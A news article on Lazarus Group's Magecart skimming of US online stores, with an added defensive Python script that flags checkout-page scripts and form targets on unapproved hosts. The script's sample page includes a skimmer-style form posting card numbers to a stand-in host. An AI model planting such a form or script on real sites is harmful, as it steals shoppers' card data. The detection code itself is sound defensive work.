October 24, 2020

North Korean hacker group Lazarus hijacked e-commerce websites to steal credit card data

Lazarus Group is currently one of the most notorious hacker groups in the world, having been active and responsible for many cyber attacks over the years.

Among them, the WannaCry ransomware that users are familiar with was the work of Lazarus. The thefts from Bangladesh National Bank and Taiwan Far East Bank were also linked to Lazarus.

Security agencies have confirmed that Lazarus is an official hacker group controlled by North Korea. Unlike ordinary hacker groups, Lazarus has some special tasks.

The main purpose of state-supported hacker groups is usually to quietly steal intelligence data, whereas Lazarus Group has been dubbed the North Korean foreign exchange group.

This is because Lazarus often launches attacks to steal money, such as bank thefts and attacks on South Korean virtual currency exchanges.

According to an analysis report released by security company SanSec, the company found malicious scripts that Lazarus had quietly implanted on the websites of some popular US e-commerce stores.

This type of attack is commonly referred to as web skimming or a Magecart attack, and its main purpose is to use malicious scripts to steal the credit card details that users fill in.

The usage rate of credit cards abroad is very high. When paying online, users only need to fill in the credit card number, CVV2 security code, name, and expiration date to pay.

The payment step does not require passwords or SMS verification codes, so many attackers have targeted e-commerce websites to steal user card information. Magecart attacks steal this card information through malicious scripts.

Lazarus uses a malicious script to generate a fake credit card form on the webpage and induce the user to fill it out. The form appears when the user completes the purchase and moves to the payment page of the e-commerce website. A form like this is expected at the payment step, so users do not become suspicious.

However, after the user enters the credit card information, it is also sent to the controller's server, and the controller can then use the information to misuse the user's card.
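A defender-side check for the behaviour described above, as an added example that is not from the original article or from SanSec: it audits a checkout page's HTML for scripts, iframes and form targets that point at hosts the shop has not approved. The allowlist, host names and sample page are constructed assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: hosts this shop intentionally loads code from or posts card data to.
ALLOWED_HOSTS = {"shop.example", "js.payments.example"}

# Tags that pull in code or send form data, and the attribute naming the target.
WATCHED = {"script": "src", "iframe": "src", "form": "action"}

# Constructed sample checkout page with one unapproved script and one
# unapproved form target, as a skimmer-injected form would produce.
SAMPLE = """
<html><body>
<script src="/static/checkout.js"></script>
<script src="https://js.payments.example/v3.js"></script>
<script src="https://cdn-stats.invalid/lib.js"></script>
<form action="https://collect.invalid/pay" method="post">
<input name="cc_number"></form>
</body></html>
"""


class CheckoutAudit(HTMLParser):
    """Record every watched tag whose target host is not on the allowlist."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host
        self.findings = []

    def handle_starttag(self, tag, attrs):
        url = dict(attrs).get(WATCHED.get(tag, ""))
        if not url:
            return  # unwatched tag, or an inline script with no src
        # Relative URLs have no hostname and resolve to the page's own host.
        host = urlparse(url).hostname or self.page_host
        if host not in ALLOWED_HOSTS:
            self.findings.append((tag, host))


def audit(html, page_host="shop.example"):
    """Return a list of (tag, host) pairs that fall outside the allowlist."""
    parser = CheckoutAudit(page_host)
    parser.feed(html)
    return parser.findings


if __name__ == "__main__":
    for tag, host in audit(SAMPLE):
        print(f"unapproved {tag} target: {host}")
```

Inline scripts and code modified on the server itself are not visible to this check, so it complements, rather than replaces, file integrity monitoring on the web server.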

After analysis, the security company found that the script code used by the hackers was homologous with code attributed to Lazarus, and after tracking, the attacker was determined to be the infamous Lazarus group.

The hacked e-commerce websites belong to well-known stores: Claire’s, Wongs Jewellers, Focus Camera, Paper Source, Jit Truck Parts, CBD Armour, Microbattery, and Realchems. At present, it is impossible to predict how many users’ credit card details have been stolen.

It is somewhat difficult to generate a fake payment form on the payment page purely from the front end. Usually, such attacks tamper directly with the website server.

The security company speculates that Lazarus may have used phishing attacks to steal Claire’s employee credentials and log in to the server to install malicious scripts.

However, this is only speculation and cannot be confirmed. The security company did confirm that the hackers broke into the server, so the number of affected users may be very large.

After SanSec contacted the company, its operations and maintenance staff removed the malicious script, but users whose credit card details were stolen may still need to contact their bank to block the card and have it replaced.

Via: bleepingcomputer